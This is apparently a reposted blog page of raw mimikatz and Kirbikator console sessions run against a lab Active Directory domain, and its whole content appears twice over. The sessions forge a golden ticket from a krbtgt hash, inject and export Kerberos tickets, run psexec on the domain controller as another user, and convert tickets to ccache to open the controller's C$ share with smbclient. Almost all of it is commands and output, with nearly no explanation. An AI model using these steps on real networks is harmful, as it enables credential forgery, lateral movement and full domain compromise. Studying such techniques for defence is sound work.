mimikazhi Kerberos Modules

Kerberos Modules

1.   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9201500:33:13)

2.   .## ^ ##.

3.   ## / ##  /* * *

4.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

5.   '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)

6.    '#####'                                     with16 modules * * */

7.   

8.   

9.  mimikatz # kerberos::

10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !

11. 

12.Module :        kerberos

13.Full name :     Kerberospackagemodule

14.Description :

15. 

16.             ptt  -  Pass-the-ticket [NT 6]

17.            list  -  List ticket(s)

18.             tgt  -  Retrieve current TGT

19.           purge  -  Purge ticket(s)

20.          golden  -  WillyWonka factory

21.            hash  -  Hash password to keys

22.             ptc  -  Pass-the-ccache [NT6]

23.           clist  -  List tickets in MIT/Heimdall ccache

24. 

25.mimikatz #

Golden Ticket

1.  mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-

2.  1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64

3.   /ticket:gold.kirbi

4.  User      : Administrator

5.  Domain    : sittingduck.info

6.  SID       : S-1-5-21-2792304509-1851296738-3446580569

7.  UserId   : 500

8.  GroupsId : *513512520518519

9.  ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt

10.Lifetime  : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5

11.4 PM

12.-> Ticket : gold.kirbi

13. 

14. * PAC generated

15. * PAC signed

16. * EncTicketPart generated

17. * EncTicketPart encrypted

18. * KrbCred generated

19. 

20.FinalTicketSaved to file !

Pass the Ticket

1.  mimikatz # kerberos::ptt gold.kirbi

2.    0 - File'gold.kirbi' : OK

3.   

4.  mimikatz # kerberos::list

5.   

6.  [00000000] - 0x00000017 - rc4_hmac_nt

7.     Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2

8.  02511:28:54 PM

9.     ServerName       : krbtgt/sittingduck.info @ sittingduck.info

10.   ClientName       : Administrator @ sittingduck.info

11.   Flags40e00000    : pre_authent ; initial ; renewable ; forwardable ;

12. 

13.mimikatz #

Injecting tickets with Kirbikator

1.  C:Users otanadminDesktop>kirbikator.exe lsa gold.kirbi

2.   

3.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

4.   .## ^ ##.

5.   ## / ##  /* * *

6.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

7.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

8.    '#####'                                                     * * */

9.   

10.Destination : Microsoft LSA API (multiple)

11. < gold.kirbi (RFC KRB-CRED (#22))

12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf

13.o : injected

Exporting active tickets

1.  mimikatz # kerberos::list /export

2.   

3.  [00000000] - 0x00000012 - aes256_hmac

4.     Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

5.  511:39:31 PM

6.     ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

7.     ClientName       : uberuser @ SITTINGDUCK.INFO

8.     Flags60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ;

9.   forwardable ;

10.   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

11..INFO.kirbi

12. 

13.[00000001] - 0x00000012 - aes256_hmac

14.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

15.511:39:31 PM

16.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

17.   ClientName       : uberuser @ SITTINGDUCK.INFO

18.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

19.orwardable ;

20.   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

21..INFO.kirbi

22. 

23.[00000002] - 0x00000012 - aes256_hmac

24.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

25.511:39:31 PM

26.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

27.   ClientName       : uberuser @ SITTINGDUCK.INFO

28.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

29.ble ; forwardable ;

30.   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

31.CK.INFO.kirbi

32. 

33.[00000003] - 0x00000012 - aes256_hmac

34.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

35.511:39:31 PM

36.   ServerName       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO

37.   ClientName       : uberuser @ SITTINGDUCK.INFO

38.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

39.ble ; forwardable ;

40.   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU

41.CK.INFO.kirbi

42. 

43.[00000004] - 0x00000012 - aes256_hmac

44.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

45.511:39:31 PM

46.   ServerName       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.

47.INFO

48.   ClientName       : uberuser @ SITTINGDUCK.INFO

49.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

50.ble ; forwardable ;

51.   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu

52.ck.info-SITTINGDUCK.INFO.kirbi

PSEXEC with standard Kerberos tickets

1.  mimikatz # kerberos::list

2.   

3.  mimikatz # (EMPTY LIST)

4.   

5.  mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

6.  .INFO.kirbi

7.    0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'

8.  : OK

9.   

10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

11.CK.INFO.kirbi

12.  0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

13.' : OK

14. 

15.mimikatz # kerberos::list

16. 

17.[00000000] - 0x00000012 - aes256_hmac

18.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

19.511:39:31 PM

20.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

21.   ClientName       : uberuser @ SITTINGDUCK.INFO

22.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

23.orwardable ;

24. 

25.[00000001] - 0x00000012 - aes256_hmac

26.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

27.511:39:31 PM

28.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

29.   ClientName       : uberuser @ SITTINGDUCK.INFO

30.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

31.ble ; forwardable ;

32. 

33.mimikatz #

34. 

35. 

36. 

37.C:Users otanadminDesktop>psexec \dc1 cmd.exe

38. 

39.PsExec v1.97 - Execute processes remotely

40.Copyright (C) 2001-2009MarkRussinovich

41.Sysinternals - www.sysinternals.com

42. 

43. 

44.MicrosoftWindows [Version6.3.9600]

45.(c) 2013MicrosoftCorporation. All rights reserved.

46. 

47.C:Windowssystem32>whoami

48.sittingduckuberuser

49. 

50.C:Windowssystem32>echo %COMPUTERNAME%

51.DC1

52. 

53.C:Windowssystem32>

Convert Mimikatz Kerberos ticket to CCache and use

1.  C:Users otanadminDesktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.

2.  sittingduck.info-SITTINGDUCK.INFO.kirbi"

3.   

4.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

5.   .## ^ ##.

6.   ## / ##  /* * *

7.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

8.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

9.    '#####'                                                     * * */

10. 

11.Destination : MIT CredentialCache (simple)

12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB

13.-CRED (#22))

14. > Single file : uberuser@SITTINGDUCK.INFO.ccache

15. 

16.C:Users otanadminDesktop>

Method 1

1.  KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$

2.  OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

3.  smb: >

Method 2

1.  root@kali:~# apt-get install krb5-user

2.  Readingpackage lists... Done

3.  Building dependency tree      

4.  Reading state information... Done

5.  The following extra packages will be installed:

6.    krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

7.  Suggested packages:

8.    krb5-doc

9.  The following NEW packages will be installed:

10.  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.

12.Need to get466 kB of archives.

13.Afterthis operation, 1,199 kB of additional disk space will be used.

14.Do you want to continue? [Y/n] y

15.0% [Connecting to http.kali.org]

16.<SNIP>

17.<SNIP>

18.<SNIP>

19. 

20.root@kali:~/Desktop# klist

21.klist: Credentials cache file '/tmp/krb5cc_0'not found

22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0

23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$

24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

25.smb: >

 

 

Kerberos Modules

1.   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9201500:33:13)

2.   .## ^ ##.

3.   ## / ##  /* * *

4.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

5.   '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)

6.    '#####'                                     with16 modules * * */

7.   

8.   

9.  mimikatz # kerberos::

10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !

11. 

12.Module :        kerberos

13.Full name :     Kerberospackagemodule

14.Description :

15. 

16.             ptt  -  Pass-the-ticket [NT 6]

17.            list  -  List ticket(s)

18.             tgt  -  Retrieve current TGT

19.           purge  -  Purge ticket(s)

20.          golden  -  WillyWonka factory

21.            hash  -  Hash password to keys

22.             ptc  -  Pass-the-ccache [NT6]

23.           clist  -  List tickets in MIT/Heimdall ccache

24. 

25.mimikatz #

Golden Ticket

1.  mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-

2.  1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64

3.   /ticket:gold.kirbi

4.  User      : Administrator

5.  Domain    : sittingduck.info

6.  SID       : S-1-5-21-2792304509-1851296738-3446580569

7.  UserId   : 500

8.  GroupsId : *513512520518519

9.  ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt

10.Lifetime  : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5

11.4 PM

12.-> Ticket : gold.kirbi

13. 

14. * PAC generated

15. * PAC signed

16. * EncTicketPart generated

17. * EncTicketPart encrypted

18. * KrbCred generated

19. 

20.FinalTicketSaved to file !

Pass the Ticket

1.  mimikatz # kerberos::ptt gold.kirbi

2.    0 - File'gold.kirbi' : OK

3.   

4.  mimikatz # kerberos::list

5.   

6.  [00000000] - 0x00000017 - rc4_hmac_nt

7.     Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2

8.  02511:28:54 PM

9.     ServerName       : krbtgt/sittingduck.info @ sittingduck.info

10.   ClientName       : Administrator @ sittingduck.info

11.   Flags40e00000    : pre_authent ; initial ; renewable ; forwardable ;

12. 

13.mimikatz #

Injecting tickets with Kirbikator

1.  C:Users otanadminDesktop>kirbikator.exe lsa gold.kirbi

2.   

3.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

4.   .## ^ ##.

5.   ## / ##  /* * *

6.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

7.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

8.    '#####'                                                     * * */

9.   

10.Destination : Microsoft LSA API (multiple)

11. < gold.kirbi (RFC KRB-CRED (#22))

12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf

13.o : injected

Exporting active tickets

1.  mimikatz # kerberos::list /export

2.   

3.  [00000000] - 0x00000012 - aes256_hmac

4.     Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

5.  511:39:31 PM

6.     ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

7.     ClientName       : uberuser @ SITTINGDUCK.INFO

8.     Flags60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ;

9.   forwardable ;

10.   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

11..INFO.kirbi

12. 

13.[00000001] - 0x00000012 - aes256_hmac

14.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

15.511:39:31 PM

16.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

17.   ClientName       : uberuser @ SITTINGDUCK.INFO

18.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

19.orwardable ;

20.   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

21..INFO.kirbi

22. 

23.[00000002] - 0x00000012 - aes256_hmac

24.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

25.511:39:31 PM

26.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

27.   ClientName       : uberuser @ SITTINGDUCK.INFO

28.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

29.ble ; forwardable ;

30.   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

31.CK.INFO.kirbi

32. 

33.[00000003] - 0x00000012 - aes256_hmac

34.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

35.511:39:31 PM

36.   ServerName       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO

37.   ClientName       : uberuser @ SITTINGDUCK.INFO

38.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

39.ble ; forwardable ;

40.   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU

41.CK.INFO.kirbi

42. 

43.[00000004] - 0x00000012 - aes256_hmac

44.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

45.511:39:31 PM

46.   ServerName       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.

47.INFO

48.   ClientName       : uberuser @ SITTINGDUCK.INFO

49.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

50.ble ; forwardable ;

51.   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu

52.ck.info-SITTINGDUCK.INFO.kirbi

PSEXEC with standard Kerberos tickets

1.  mimikatz # kerberos::list

2.   

3.  mimikatz # (EMPTY LIST)

4.   

5.  mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

6.  .INFO.kirbi

7.    0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'

8.  : OK

9.   

10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

11.CK.INFO.kirbi

12.  0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

13.' : OK

14. 

15.mimikatz # kerberos::list

16. 

17.[00000000] - 0x00000012 - aes256_hmac

18.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

19.511:39:31 PM

20.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

21.   ClientName       : uberuser @ SITTINGDUCK.INFO

22.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

23.orwardable ;

24. 

25.[00000001] - 0x00000012 - aes256_hmac

26.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

27.511:39:31 PM

28.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

29.   ClientName       : uberuser @ SITTINGDUCK.INFO

30.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

31.ble ; forwardable ;

32. 

33.mimikatz #

34. 

35. 

36. 

37.C:Users otanadminDesktop>psexec \dc1 cmd.exe

38. 

39.PsExec v1.97 - Execute processes remotely

40.Copyright (C) 2001-2009MarkRussinovich

41.Sysinternals - www.sysinternals.com

42. 

43. 

44.MicrosoftWindows [Version6.3.9600]

45.(c) 2013MicrosoftCorporation. All rights reserved.

46. 

47.C:Windowssystem32>whoami

48.sittingduckuberuser

49. 

50.C:Windowssystem32>echo %COMPUTERNAME%

51.DC1

52. 

53.C:Windowssystem32>

Convert Mimikatz Kerberos ticket to CCache and use

1.  C:Users otanadminDesktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.

2.  sittingduck.info-SITTINGDUCK.INFO.kirbi"

3.   

4.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

5.   .## ^ ##.

6.   ## / ##  /* * *

7.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

8.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

9.    '#####'                                                     * * */

10. 

11.Destination : MIT CredentialCache (simple)

12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB

13.-CRED (#22))

14. > Single file : uberuser@SITTINGDUCK.INFO.ccache

15. 

16.C:Users otanadminDesktop>

Method 1

1.  KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$

2.  OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

3.  smb: >

Method 2

1.  root@kali:~# apt-get install krb5-user

2.  Readingpackage lists... Done

3.  Building dependency tree      

4.  Reading state information... Done

5.  The following extra packages will be installed:

6.    krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

7.  Suggested packages:

8.    krb5-doc

9.  The following NEW packages will be installed:

10.  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.

12.Need to get466 kB of archives.

13.Afterthis operation, 1,199 kB of additional disk space will be used.

14.Do you want to continue? [Y/n] y

15.0% [Connecting to http.kali.org]

16.<SNIP>

17.<SNIP>

18.<SNIP>

19. 

20.root@kali:~/Desktop# klist

21.klist: Credentials cache file '/tmp/krb5cc_0'not found

22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0

23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$

24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

25.smb: >

标签: mimikatz, kerberos

 

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/backlion/p/6025754.html